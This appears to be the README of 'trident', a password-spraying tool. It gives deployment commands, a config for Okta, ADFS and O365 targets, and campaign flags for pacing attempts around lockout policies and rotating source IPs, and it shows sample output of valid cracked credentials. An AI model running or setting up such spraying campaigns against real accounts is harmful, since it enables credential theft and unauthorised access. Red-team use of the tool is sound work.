trident: automated password spraying tool

trident

The Trident project is an automated password spraying tool developed to meet the following requirements:

• the ability to be deployed on several cloud platforms/execution providers
• the ability to schedule spraying campaigns in accordance with a target’s account lockout policy
• the ability to increase the IP pool that authentication attempts originate from for operational security purposes
• the ability to quickly extend functionality to include newly-encountered authentication platforms

Architecture

Deployment

Deploying trident requires a Google Cloud project, a domain name (for the orchestrator API), and a Cloudflare Access configuration for this domain. Cloudflare Access is used to authenticate requests to the orchestrator API.

brew install cloudflare/cloudflare/cloudflared
brew install terraform

cd terraform
cloudflared login
terraform init
terraform plan
terraform apply

Installation

Trident has a command-line interface available on the releases page. Alternatively, you can download and install trident-client via go get:

Usage

Config

The trident-client binary sends API requests to the orchestrator. It reads from ~/.trident/config.yaml, which has the following format:

orchestrator-url: https://trident.example.org

providers:

  okta:

    subdomain: example

  adfs:

    domain: adfs.example.org

  o365:

    domain: login.microsoft.com

Campaigns

With a valid config.yaml, the trident-client can be used to create password spraying campaigns, as shown below:

trident-client campaign -u usernames.txt -p passwords.txt –interval 5s –window 120s

The –interval option allows the operator to insert delays between credential attempts. The –window option allows the operator to set a hard stop time for the campaign. Additional arguments are documented below:

Usage:

  trident-cli campaign [flags]



Flags:

  -a, --auth-provider string   this is the authentication platform you are attacking (default "okta")

  -h, --help                   help for campaign

  -i, --interval duration      requests will happen with this interval between them (default 1s)

  -b, --notbefore string       requests will not start before this time (default "2020-09-09T22:31:38.643959-05:00")

  -p, --passfile string        file of passwords (newline separated)

  -u, --userfile string        file of usernames (newline separated)

  -w, --window duration        a duration that this campaign will be active (ex: 4w) (default 672h0m0s)

Results

The results subcommand can be used to query the result table. This subcommand has several options but defaults to showing all valid credentials across all campaigns.

$ trident-client results

+----+-------------------+------------+-------+

| ID | USERNAME          | PASSWORD   | VALID |

+----+-------------------+------------+-------+

|  1 | alice@example.org | Password1! | true  |

|  2 | bob@example.org   | Password2! | true  |

|  3 | eve@example.org   | Password3! | true  |

+----+-------------------+------------+-------+

Additional arguments are documented below: